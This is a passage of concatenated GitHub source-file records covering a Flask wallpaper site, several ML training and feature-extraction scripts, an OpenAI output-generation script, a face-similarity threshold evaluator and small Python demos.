self.depth_bins+self.keypoints], dtype = tf.float32), trainable=True, dtype = tf.float32)\n self.loss = PoseLoss(self.keypoints, self.depth_bins)\n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=None, dtype=tf.float32), tf.TensorSpec(shape=[None,self.keypoints,3], dtype=tf.float32))])\n super().build(inputs_shape)\n\n def call(self, inputs):\n feature, gt_target = inputs\n print(\"Tracing with\", feature, gt_target)\n batched_repr = tf.repeat(self.representation, repeats = tf.shape(feature)[0], axis=0)\n return self.loss([batched_repr, gt_target])\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"bela127/3D_Person_Pose_Estimation_from_2D_Singelview_Image_Data","sub_path":"src/ShAReD_Net/training/loss/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":26253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34075863838","text":"import os\r\nfrom PIL import Image\r\nfrom flask import Flask, render_template, request\r\nfrom werkzeug.utils import redirect, secure_filename\r\nfrom flask_login import LoginManager, current_user, login_required, logout_user\r\n\r\nfrom data import db_session\r\nfrom data.users import User\r\nfrom data.wallpapers import WallPapers\r\nfrom forms.user import RegisterForm\r\nfrom forms.wallpapers import WallPapersForm\r\nfrom data.tags import Tags\r\n\r\nUPLOAD_FOLDER = './static/img'\r\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\n\r\ndef add_user(name, email):\r\n user = User()\r\n user.name = name\r\n user.email = email\r\n return user\r\n\r\n\r\ndef add_tags(wallpaper):\r\n tags = []\r\n for elem in wallpaper.content.lower().replace(',', '').split():\r\n tag = Tags()\r\n tag.title = elem\r\n tag.wallpaper = wallpaper\r\n tags.append(tag)\r\n return tags\r\n\r\n\r\n\r\ndef add_wallpaper(title, file_name, content, user):\r\n wallpaper = WallPapers()\r\n wallpaper.title = title\r\n wallpaper.file = file_name\r\n wallpaper.content = content\r\n wallpaper.user = user\r\n return wallpaper\r\n\r\n\r\ndef created(session):\r\n # Создание администратора\r\n admin = add_user('Admin', 'er@gmail.com')\r\n session.add(admin)\r\n # Создание пользователя user1\r\n user1 = add_user('user1', 'user1@gamil.com')\r\n session.add(user1)\r\n # Создание обоев пользователем user1\r\n user1 = session.query(User).filter(User.id == 2).first()\r\n wallpaper = add_wallpaper('forest', 'forest_1.png', 'лес, весна', user1)\r\n session.add(wallpaper)\r\n user1.wallpapers.append(wallpaper)\r\n tags = add_tags(wallpaper)\r\n \r\n '''for tag in tags:\r\n session.add(tag)'''\r\n\r\n for tag in tags:\r\n user1.tags.append(tag)\r\n session.commit()\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n db_sess = db_session.create_session()\r\n # wallpapers = db_sess.query(WallPapers)\r\n if current_user.is_authenticated:\r\n wallpapers = db_sess.query(WallPapers).filter(\r\n (WallPapers.user == current_user) | (WallPapers.is_private != True))\r\n name = current_user.name\r\n text = f'Обои пользователя {name}'\r\n else:\r\n wallpapers = db_sess.query(WallPapers)\r\n text = 'Все обои'\r\n name = ''\r\n return render_template(\"index.html\", wallpapers=wallpapers, text=text, name=name)\r\n\r\n\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef reqister():\r\n form = RegisterForm()\r\n if form.validate_on_submit():\r\n if form.password.data != form.password_again.data:\r\n return render_template('register.html', title='Регистрация',\r\n form=form,\r\n message=\"Пароли не совпадают\")\r\n db_sess = db_session.create_session()\r\n if db_sess.query(User).filter(User.email == form.email.data).first():\r\n return render_template('register.html', title='Регистрация',\r\n form=form,\r\n message=\"Такой пользователь уже есть\")\r\n user = User(name=form.name.data, email=form.email.data)\r\n user.set_password(form.password.data)\r\n db_sess.add(user)\r\n db_sess.commit()\r\n return redirect('/login')\r\n return render_template('register.html', title='Регистрация', form=form)\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n db_sess = db_session.create_session()\r\n return db_sess.query(User).get(user_id)\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n from forms.loginform import LoginForm\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n db_sess = db_session.create_session()\r\n user = db_sess.query(User).filter(User.email == form.email.data).first()\r\n if user and user.check_password(form.password.data):\r\n from flask_login import login_user\r\n login_user(user, remember=form.remember_me.data)\r\n return redirect(\"/\")\r\n return render_template('login.html',\r\n message=\"Неправильный логин или пароль\",\r\n form=form)\r\n return render_template('login.html', title='Авторизация', form=form)\r\n\r\n\r\n@app.route('/logout')\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n return redirect(\"/\")\r\n\r\n\r\ndef allowed_file(filename):\r\n return '.' in filename and \\\r\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\r\n\r\n\r\n@app.route('/wallpapers', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_wallpapers():\r\n form = WallPapersForm()\r\n if form.validate_on_submit():\r\n db_sess = db_session.create_session()\r\n wallpapers = WallPapers()\r\n wallpapers.title = form.title.data\r\n file = request.files['file']\r\n if file and allowed_file(file.filename):\r\n filename = secure_filename(file.filename)\r\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\r\n im = Image.open(f'static/img/{filename}')\r\n im_resize = im.resize((1900, 1200))\r\n im_resize.save(f'static/img/{filename}')\r\n wallpapers.file = filename\r\n wallpapers.content = form.content.data\r\n\r\n current_user.wallpapers.append(wallpapers)\r\n\r\n for tag in add_tags(wallpapers):\r\n current_user.tags.append(tag)\r\n\r\n db_sess.merge(current_user)\r\n db_sess.commit()\r\n\r\n return redirect('/')\r\n return render_template('wallpapers.html', title='Добавление',\r\n form=form)\r\n\r\n\r\n@app.route('/wallpapers_delete/', methods=['GET', 'POST'])\r\n@login_required\r\ndef wallpapers_delete(id):\r\n db_sess = db_session.create_session()\r\n wallpapers = db_sess.query(WallPapers).filter(WallPapers.id == id,\r\n WallPapers.user == current_user\r\n ).first()\r\n if wallpapers:\r\n tags_delete = db_sess.query(Tags).filter(Tags.wallpaper_id == wallpapers.id)\r\n for tag in tags_delete:\r\n db_sess.delete(tag)\r\n db_sess.delete(wallpapers)\r\n db_sess.commit()\r\n else:\r\n os.abort(404)\r\n return redirect('/')\r\n\r\n\r\n@app.route(\"/show_tags/\")\r\ndef show_tags(tagname):\r\n # logout()\r\n db_sess = db_session.create_session()\r\n tags = db_sess.query(Tags).filter(Tags.title == tagname)\r\n wallpapers_id = db_sess.query(Tags.wallpaper_id).filter(Tags.title == tagname).all()\r\n wallpapers_id = [item[0] for item in wallpapers_id]\r\n wallpapers = db_sess.query(WallPapers).filter(WallPapers.id.in_(wallpapers_id))\r\n text = f'Обои с тегом {tagname}'\r\n return render_template(\"index.html\", wallpapers=wallpapers, text=text, name='')\r\n\r\n\r\n@app.route(\"/show_user/\")\r\ndef show_user(userid):\r\n # logout()\r\n db_sess = db_session.create_session()\r\n wallpapers = db_sess.query(WallPapers).filter(WallPapers.user_id == userid)\r\n user = db_sess.query(User).filter(User.id == userid).first()\r\n text = f'Обои пользователя {user.name}'\r\n return render_template(\"index.html\", wallpapers=wallpapers, text=text, name='')\r\n\r\n\r\ndef main():\r\n db_session.global_init(\"db/wallpaper.db\")\r\n session = db_session.create_session()\r\n # Тестовое создание базы данных\r\n # created(session)\r\n # Проверка базы данных\r\n '''for user in session.query(User):\r\n print(user)\r\n for elem in session.query(WallPapers):\r\n print(elem)'''\r\n app.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"Ilyha-go/Yandeksp","sub_path":"WebProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10130242334","text":"import os\nimport json\n\nfrom .base_features_extractor import BaseFeaturesExtractor\n\n\nclass FeaturesPsyDict(BaseFeaturesExtractor):\n # load psydicts\n psydict_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data', 'psydicts.json')\n with open(psydict_path) as fp:\n psydicts = json.load(fp)\n\n def __init__(self, psy_dict_normalization):\n super().__init__()\n self.psy_dict_normalization = psy_dict_normalization\n\n def __call__(self, lemma_mys, ) -> dict:\n lemma_text, sentence_count, words_count = FeaturesPsyDict.lem_info(lemma_mys)\n div = self._get_div(self.psy_dict_normalization, sentence_count, words_count)\n\n tgw_normalized_occur_count = self.occur_count_with_normalization(self.psydicts['tgw'], lemma_text, div)\n basic_emotions_normalized_occur_count = self.occur_count_with_normalization(\n self.psydicts['basic_emotions'], lemma_text, div)\n emowords = self.emowords(self.psydicts['emowords'], lemma_text, div)\n sentiment = self.sentiment(self.psydicts['linis-crowd'], lemma_text, div)\n\n return {\n **tgw_normalized_occur_count, **basic_emotions_normalized_occur_count,\n **emowords, **sentiment\n }\n\n @staticmethod\n def lem_info(lemma):\n words_count = 0\n lemma_text = ' '\n sentence_count = len(lemma)\n for sentence in lemma:\n for token in sentence:\n if token.isalpha():\n words_count += 1\n lemma_text += token+' '\n return lemma_text, sentence_count, words_count\n\n def occur_count_with_normalization(self, psydict, lemma_text, div):\n res = {}\n for _dict in psydict:\n res[_dict] = 0.0\n for word in psydict[_dict]:\n res[_dict] += lemma_text.count(' '+word+' ')\n self._normalize(res, div)\n return res\n\n def emowords(self, psydict, lemma_text, div):\n res = {}\n for _dict in psydict:\n res[_dict] = 0.0\n for word in psydict[_dict]:\n res[_dict] += lemma_text.count(' '+word+' ')\n\n res['ew_negative'] += res['+-']\n res['ew_negative'] += res['/-']\n res['ew_de_emotives'] += res['?/']\n res['ew_de_emotives'] += res['-/']\n res['ew_positive'] -= res.pop('+-')\n res['ew_ambivalent'] -= res.pop('?/')\n res['ew_negative'] -= res.pop('-/')\n res['ew_de_emotives'] -= res.pop('/-')\n\n self._normalize(res, div)\n\n return res\n\n def sentiment(self, psydict, lemma_text, div):\n res = {'sentiment_rate': 0.0}\n for word in psydict:\n res['sentiment_rate'] += psydict[word] * lemma_text.count(' '+word+' ')\n res['sentiment_rate'] = res['sentiment_rate'] / div\n return res\n\n def _get_div(self, psy_dict_normalization, sentence_count, words_count):\n if psy_dict_normalization == 'abs':\n div = 1\n elif psy_dict_normalization == 'sentences':\n div = sentence_count\n elif psy_dict_normalization == 'words':\n div = words_count\n else:\n raise TypeError(\"psy_dict_normalization arg should be 'abs', 'words' or 'sentences'\")\n return div\n\n def _normalize(self, res, div):\n for _dict in res:\n res[_dict] /= div\n","repo_name":"tchewik/titanis-open","sub_path":"src/titanis/features/features_psy_dict.py","file_name":"features_psy_dict.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"71519119161","text":"import os\nimport sys\nsys.path.extend(\"..\")\nimport script\nimport numpy as np\n\nif __name__ == \"__main__\":\n # Build configuration object\n config = script.ScriptConfig()\n # Dump data from 10.141.209.3, with original format\n if True:\n downloader = script.MongoDumper(config)\n downloader.dump(np.inf, save_to = config.data_path)\n # Tokenize post\n dir = os.path.dirname(config.data_path)\n file_name, _ = os.path.splitext(os.path.basename(config.data_path))\n new_file_path = os.path.join(dir, file_name+\".tok\")\n script.tokenize_text(config,config.data_path, new_file_path)\n # Change to UTH format\n read_from = new_file_path\n save_to = os.path.join(dir, file_name+\".uth\")\n script.format2UTHD(config, read_from = read_from, save_to = save_to)\n","repo_name":"v-mipeng/Hashtag","sub_path":"source/script/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71931501881","text":"\"\"\"\nNetwork that forms encoding based on random projections and their \n\nAuthor: Ian Char\nDate: December 12, 2022\n\"\"\"\nimport torch\n\nfrom rlkit.torch.networks.mlp import Mlp\nfrom rlkit.torch.core import PyTorchModule\n\n\nclass RprojSIDQNet(PyTorchModule):\n def __init__(\n self,\n obs_dim: int,\n act_dim: int,\n num_projections: int,\n lookback_len: int,\n decoder_width: int,\n decoder_depth: int,\n layer_norm: bool = True,\n sum_over_terms: bool = False,\n proj_init_w=1.0,\n ):\n \"\"\"Constructor.\n\n Args:\n obs_dim: Size of the observation dim.\n act_dim: Size of the action dim.\n encode_size: Size of the statistic.\n lookback_len: The lookback to consider for the integral.\n encoder_width: Width of the hidden units in the encoder.\n encoder_depth: Number of hidden units in the encoder.\n decoder_width: Width of the hidden units in the decoder.\n decoder_depth: Number of hidden units in the decoder.\n encode_action_seq: Whether to encode past action sequence.\n \"\"\"\n super().__init__()\n self.lookback_len = lookback_len\n self.sum_over_terms = sum_over_terms\n self.projections = torch.nn.Linear(obs_dim, num_projections, bias=False)\n self.projections.weight.data.uniform_(-proj_init_w, proj_init_w)\n self.projections.weight.requires_grad = False\n self.decoder = Mlp(\n input_size=num_projections * 3 + obs_dim + act_dim,\n output_size=1,\n hidden_sizes=[decoder_width for _ in range(decoder_depth)],\n )\n if layer_norm:\n self.layer_norm = torch.nn.LayerNorm(3 * num_projections)\n else:\n self.layer_norm = None\n\n def forward(self, obs_seq, prev_act_seq, act, masks=None, **kwargs):\n \"\"\"Forward pass.\n\n Args:\n obs_seq: Observation sequence (batch_size, L, obs_dim)\n prev_act_seq: Previous action sequence (batch_size, L, act_dim)\n act: The current action (batch_size, act_dim)\n\n Returns: Value for last observation + action (batch_size, 1)\n \"\"\"\n stats = self.projections(obs_seq)\n if masks is not None:\n stats *= masks\n if self.sum_over_terms:\n iterm = torch.sum(stats, dim=1)\n else:\n iterm = torch.mean(stats, dim=1)\n sid_out = torch.cat([\n stats[:, -1],\n iterm,\n stats[:, -1] - stats[:, -2],\n ], dim=-1)\n if self.layer_norm is not None:\n sid_out = self.layer_norm(sid_out)\n return self.decoder(torch.cat([\n obs_seq[:, -1],\n act,\n sid_out,\n ], dim=-1))\n","repo_name":"IanChar/rlkit2","sub_path":"rlkit/torch/networks/seq2val/rproj_sid.py","file_name":"rproj_sid.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9191187545","text":"import speech_recognition as sr\nfrom interpreter.interpreter import Interpreter\n\ninterpreter = Interpreter(auto_run = True, messages = context)\n\ndef listen_microphone():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\")\n # audio.export(\"audio.wav\", format=\"wav\")\n # result = model.transcribe(\"audio.wav\")\n # text = str(result[\"text\"])\n text = sr.recognize_google(audio)\n print(f\"Text: {text}\")\n resp = interpreter.chat(str(text), return_messages = True)\n # with open(\"resp.json\", \"w\") as file:\n # json.dump(resp, file)\n except sr.UnknownValueError:\n print(\"Could not understand audio\")\n except sr.RequestError as e:\n print(f\"Error: {e}\")\n\nwhile True:\n listen_microphone()","repo_name":"CodeGeek04/merged_project","sub_path":"Sources/windows/speech_recog.py","file_name":"speech_recog.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33285985598","text":"import os\nimport json\nimport random\nimport re\nimport tqdm\nimport argparse\nimport openai\nimport time\nfrom typing import Any\nimport logging\nfrom utils import *\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\nrandom.seed(42)\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--batch_dir\",\n type=str,\n default=\"data/text-davinci-003/\",\n help=\"The directory where the batch is stored.\",\n )\n parser.add_argument(\n \"--input_tasks_path\",\n type=str,\n required=False,\n default=None,\n help=\"The path to the input task data.\",\n )\n\n parser.add_argument(\n \"--output_tasks_path\",\n type=str,\n required=False,\n default=None,\n help=\"The path to the output task data.\",\n )\n parser.add_argument(\n \"--engine\",\n type=str,\n default=\"davinci\",\n help=\"The engine to use.\"\n )\n parser.add_argument(\n \"--request_batch_size\",\n type=int,\n default=5,\n help=\"The number of requests to send to GPT3 at a time.\"\n )\n parser.add_argument(\n \"--max_tokens\",\n type=int,\n default=600,\n help=\"Max input tokens.\"\n )\n parser.add_argument(\n \"--max_generation\",\n type=int,\n default=-1,\n help=\"Max input to generate.\"\n )\n parser.add_argument(\n \"--retries\",\n type=int,\n default=5,\n help=\"failed retry times.\"\n )\n parser.add_argument(\n \"--task\",\n type=str,\n required=False,\n default=None,\n help=\"the task to generate\"\n )\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n \n input_tasks=load_or_convert_to_dataframe(args.input_tasks_path)\n if args.max_generation!=-1:\n input_tasks=input_tasks[:args.max_generation]\n instruction=\"\"\n if args.task=='iCliniq':\n instruction=\"If you are a doctor, please answer the medical questions based on the patient's description.\"\n input_instructions = [\n {\n \"instruction\": t[\"instruction\"] if \"instruction\" in t else instruction,\n \"input\": t[\"input\"] if \"input\" in t else \"\",\n } \n for t in input_tasks\n ]\n \n print(f\"Loaded {len(input_instructions)} seed instructions\")\n\n \n os.makedirs(args.batch_dir, exist_ok=True)\n # load the LM-generated instructions\n machine_output = []\n if os.path.exists(os.path.join(args.batch_dir, args.output_tasks_path)):\n with open(os.path.join(args.batch_dir, args.output_tasks_path), \"r\") as fin:\n for line in fin:\n instruction_info = json.loads(line)\n machine_output.append(instruction_info)\n print(f\"Loaded {len(machine_output)} machine-generated outputs\")\n\n\n \n # now let's generate ouput!\n total=len(input_instructions)\n progress_bar = tqdm.tqdm(total=total)\n\n progress_bar.update(len(machine_output))\n\n wait_base = 10\n retry_cnt = 0\n batch_size=args.request_batch_size\n results=[]\n target_length=args.max_tokens\n with open(os.path.join(args.batch_dir,args.output_tasks_path), \"a\") as fout:\n idx=len(machine_output)\n import pdb;pdb.set_trace()\n while len(machine_output) < len(input_instructions):\n prompts=[]\n input_list=[]\n j=0\n while j < min(batch_size,total-idx):\n input_task=input_instructions[idx+j]\n input_list.append(input_task)\n task_prompt = gpt_output_generation_encode_prompt(input_task,args)\n if task_prompt==\"\":\n break\n prompts.append(task_prompt)\n j+=1\n if len(prompts)==0:\n break\n while retry_cnt <= args.retries:\n batch_results=[\"\"] * len(prompts)\n try:\n # batched example, with 10 story completions per request\n batch_predictions = openai.Completion.create(\n model=args.engine,\n prompt=prompts,\n max_tokens=target_length,\n temperature= 0\n )\n for choice in batch_predictions.choices:\n batch_results[choice.index] = choice.text\n\n # predictions += batch_results\n wait_base = 10\n \n retry_cnt=0\n break\n\n except openai.error.OpenAIError as e:\n print(f\"OpenAIError: {e}.\")\n if \"Please reduce the length of the messages or completion\" in str(e):\n target_length = int(target_length * 0.8)\n print(f\"Reducing target length to {target_length}, retrying...\")\n else:\n retry_cnt += 1\n print(\"retry number: \", retry_cnt)\n time.sleep(wait_base)\n wait_base = wait_base*1.5\n\n instructions = []\n for i,result in enumerate(batch_results):\n try:\n input_list[i]['output']=result\n fout.write(json.dumps(input_list[i]) + \"\\n\")\n machine_output.append(input_list[i]['output'])\n idx+=1\n progress_bar.update(1)\n except:\n continue\n\n","repo_name":"XZhang97666/AlpaCare","sub_path":"task_output_generation/output_generation_completion.py","file_name":"output_generation_completion.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"19342811700","text":"import pandas as pd\n\nimport os\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom transformers import (AutoModel,AutoModelForMaskedLM, \n AutoTokenizer, LineByLineTextDataset,\n DataCollatorForLanguageModeling,\n Trainer, TrainingArguments)\n\n\nfrom config.configs import Config as c\nfrom utils import process_text\n\nif __name__ == \"__main__\":\n BASE_DATA_PATH = c.base_data_path\n OUTPUT_PATH = c.output_path + \"/clrp_roberta_base\"\n CHKPT_PATH = c.output_path + '/clrp_roberta_base_chk'\n\n if not os.path.exists(OUTPUT_PATH):\n os.makedirs(OUTPUT_PATH)\n\n if not os.path.exists(CHKPT_PATH):\n os.makedirs(CHKPT_PATH)\n\n train_data = pd.read_csv(os.path.join(BASE_DATA_PATH, 'train.csv'))\n test_data = pd.read_csv(os.path.join(BASE_DATA_PATH, 'test.csv'))\n\n clrp_data = pd.concat([train_data, test_data])\n\n # Prepare data\n text_data = clrp_data[\"excerpt\"].apply(process_text)\n text = '\\n'.join(text_data.tolist())\n # Temporarily output as .txt file\n TEXT_OUTPUT_PATH = os.path.join(c.output_path, 'text.txt')\n with open(TEXT_OUTPUT_PATH, 'w') as f:\n f.write(text)\n\n # Load model and tokenizer\n model_name = 'roberta-base'\n model = AutoModelForMaskedLM.from_pretrained(model_name)\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n tokenizer.save_pretrained(OUTPUT_PATH)\n\n train_dataset = LineByLineTextDataset(\n tokenizer=tokenizer,\n file_path=TEXT_OUTPUT_PATH, #mention train text file here\n block_size=256)\n\n valid_dataset = LineByLineTextDataset(\n tokenizer=tokenizer,\n file_path=TEXT_OUTPUT_PATH, #mention valid text file here\n block_size=256)\n\n data_collator = DataCollatorForLanguageModeling(\n tokenizer=tokenizer, mlm=True, mlm_probability=0.15)\n\n training_args = TrainingArguments(\n output_dir=os.path.join(CHKPT_PATH), #select model path for checkpoint\n overwrite_output_dir=True,\n num_train_epochs=1,\n per_device_train_batch_size=16,\n per_device_eval_batch_size=16,\n evaluation_strategy= 'steps',\n save_total_limit=2,\n eval_steps=200,\n metric_for_best_model='eval_loss',\n greater_is_better=False,\n load_best_model_at_end =True,\n prediction_loss_only=True,\n report_to = \"none\")\n\n trainer = Trainer(\n model=model,\n args=training_args,\n data_collator=data_collator,\n train_dataset=train_dataset,\n eval_dataset=valid_dataset)\n\n trainer.train()\n trainer.save_model(OUTPUT_PATH)","repo_name":"ttya16/commonlit_readability","sub_path":"src/pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72891943161","text":"class student:\n def __init__(self,name,age,branch,rno):\n self.name=name\n self.age=age\n self.branch=branch\n self.rno=rno\n\n def studentdata(self):\n print(\"Student name\",self.name)\n print(\"student age\",self.age)\n print(\"student branch\",self.branch)\n print(\"student roll no\",self.rno)\n\nobject=student( \"bhagyashri\",18,\"CSE\",103)\nobject.studentdata()\n\n\n\n","repo_name":"BAMANEBHAGYASHRI/Basic_Python","sub_path":"OOP/Constructors/Parameterized_Constructor.py","file_name":"Parameterized_Constructor.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26169243531","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*- \n# @Time : 2019/12/19 15:31 \n# @Author : limbor.liu\n# @File : YT_threshold.py \n# @Product:PyCharm\n#\nimport os,sys\nimport numpy as np\nimport time\nimport random\nfrom datetime import datetime\nfrom xlwt import Workbook\nfrom functools import partial\n\ndef getsimilar_fromtxt(filedir):\n similarity = []\n rejection = 0\n with open(filedir) as f:\n similarlist = f.readlines()\n Truenum = len(similarlist) // 3\n Falsenum = len(similarlist) * 2 // 3\n for similar in similarlist:\n actual_issame = similar.strip().split(',')\n if actual_issame[1] != \"-10302\": ##接口请求拒识的返回码\n similarity.append(float(actual_issame[1]))\n else:\n if actual_issame[0] == 'True':\n Truenum-=1\n if actual_issame[0] == 'False':\n Falsenum-=1\n rejection+=1\n actual_issame = []\n for x in range(0, Truenum):\n actual_issame.append(True)\n for x in range(0, Falsenum):\n actual_issame.append(False)\n print('系统拒检测 Rejection Rate: ',rejection/len(similarity), Truenum, Falsenum)\n return actual_issame, similarity, Truenum, Falsenum\n\n##\ndef calculate_accuracy(threshold, actual_issameList, distList):\n ##注意:此处需要根据接口返回相似度的评判标准进行选择,依图用np.greater,欧式距离则用np.less\n # predict_issame = np.less(distList, threshold) #反余弦/pi 表示 distList,与相似度相反,比小为相似,KC用\n predict_issame = np.greater(distList, threshold) #直接用余弦距离表示distList,可看作相似度,比大为相似,依图用\n tp = np.sum(np.logical_and(predict_issame, actual_issameList))\n fp = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issameList)))\n tn = np.sum(np.logical_and(np.logical_not(predict_issame), np.logical_not(actual_issameList)))\n fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issameList))\n\n tpr = 0 if (tp + fn == 0) else float(tp) / float(tp + fn) ##所有正类中,有多少被预测成正类(正类预测正确)\n recall = tpr\n fpr = 0 if (fp + tn == 0) else float(fp) / float(fp + tn) ##所有反类中,有多少被预测成正类(正类预测错误);类间总数为分母,来计算误识率\n acc = float(tp + tn) / len(distList) ##准确率\n precision = 0 if (tp + fp == 0) else float(tp) / float(tp + fp) ##精准率\n\n tnr = 0 if (tn + fp == 0) else float(tn) / float(tn + fp) ##反类预测正确:错的识别成错的\n fnr = 0 if (tp + fn == 0) else float(fn) / float(tp + fn) ##反类预测错误:对的识别成错的\n fnmr = 1 - tpr\n\n return recall, precision, acc, tnr, fpr,fnr,tpr,fnmr\n\ndef dislist_threshold(actual_issamelis,distlist,Pnum, Nnum, model_name,testsuite,cosin_oushi ='similarity'):\n to = time.time()\n if cosin_oushi.find('similarity')> 0 :\n thresholds = np.arange(0.01, 1.01, 0.01)\n elif cosin_oushi.find('oushi')> 0 :\n thresholds = np.arange(0.01, 3.21, 0.01)\n else:\n thresholds = np.arange(0.01, 1.01, 0.01)\n\n file_name = model_name + '_' + testsuite + cosin_oushi ## 模型+测试集命名\n book = Workbook(encoding='utf-8')\n sheet1 = book.add_sheet('sheet1',cell_overwrite_ok=True)\n ## 表示将[x:x+m]行[y:y+n]列的矩阵合并成一个单元格。存放第五个参数的内容,同理,style参数可以不传参\n sheet1.write_merge(0, 0, 0, 4, '测试日期:' + now)\n sheet1.write_merge(0, 0, 5, 8, '测试模型:' + model_name)\n sheet1.write_merge(1, 1, 0, 4, '测试数据:' + testsuite+' 本模型提取特征数%s'%picNum)\n sheet1.write_merge(1, 1, 5, 8, '相似距离 '+ cosin_oushi)\n sheet1.write_merge(2, 2, 0, 4, '正测试单元数量:' + str(Pnum))\n sheet1.write_merge(2, 2, 5, 8, '负测试单元数量:' + str(Nnum))\n\n #准确率(accuracy) =(TP+TN)/(TP+FN+FP+TN)\n title_col = ['threshold', 'recall','precision','acc','tnr','fpr','fnr','tpr','fnmr']\n for ti in range(len(title_col)):\n sheet1.write(3, ti, title_col[ti])\n row = 4\n for threshold in thresholds:\n result_accuracy = calculate_accuracy(threshold*100,actual_issamelis, distlist)\n res_accuracy = list(map(myRound,result_accuracy))\n ##写入xls\n res_accuracy.insert(0,threshold)\n for col in range(len(res_accuracy)):\n sheet1.write(row, col , res_accuracy[col])\n row+=1\n book.save('./' + file_name+ now + '.xls')\n print(time.strftime('[%H:%M:%S]'),'本次调用 dislist_threshold %s 运行耗时耗时(秒)==>> %f' % (cosin_oushi,time.time() - to))\n\nif __name__=='__main__':\n model_name = 'YiTu上海'\n now = datetime.strftime(datetime.now(),'%Y-%m-%d-%H-%M-%S')\n print(now,datetime.now())\n myRound = partial(round,ndigits=9)\n root = './'\n for dirpath, dirname,filenames in os.walk(root):\n for file in filenames:\n if 'similarlist' in file:\n testsuite = file.split('_')[1]\n if testsuite.find('MegaFace') > -1:\n picNum = 1002\n elif testsuite.find('lfw') > -1:\n picNum = 13233\n elif testsuite.find('shenzhen') > -1:\n picNum = 30346\n elif testsuite.find('ytf') > -1:\n picNum = 32504\n else:\n picNum = 'NotSure'\n print(testsuite,picNum)\n actual_issamelis, cosdistlis, Pnum, Nnum= getdistance_fromnpy = getsimilar_fromtxt(file)\n dislist_threshold(actual_issamelis, cosdistlis, Pnum, Nnum, model_name, testsuite, 'similarity')\n\n\n\n\n\n\n\n\n\n","repo_name":"Hero-Ting/Git_Code","sub_path":"YT_threshold_similarity.py","file_name":"YT_threshold_similarity.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39774292440","text":"from PIL import Image\nfrom flask import current_app\nfrom secrets import token_hex\nfrom os import path\n\n\ndef resize_and_save_post(input_picture, new_res):\n \"\"\"\n Takes in and size and resizes to\n given size and outputs file name.\n \"\"\"\n random_hex = token_hex(8)\n _, f_ext = path.splitext(input_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = path.join(\n current_app.root_path, 'static/img/posted', picture_fn)\n\n i = Image.open(input_picture)\n\n if i.size[0] == new_res[0] and i.size[1] == new_res[1]:\n return picture_fn\n\n scaled_res = (new_res[0]*2, new_res[1]*2)\n i.thumbnail(scaled_res)\n w, h = i.size[0], i.size[1]\n i = i.crop((w//2 - new_res[0]//2, h//2 - new_res[1]//2, w//2 + new_res[0]//2, h//2 + new_res[1]//2))\n i.save(picture_path, optimize=True, quality=85)\n\n return picture_fn\n\n","repo_name":"mushfikurr/edu-social-media","sub_path":"lore/main/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29816891750","text":"import http\nimport importlib\nimport unittest.mock\n\nimport deepdiff\nimport fastapi.testclient\nimport kfp\nimport kfp_server_api.models\nimport pytest\nimport sqlalchemy.orm\n\nimport mlrun.api.crud\nimport mlrun.api.schemas\nimport 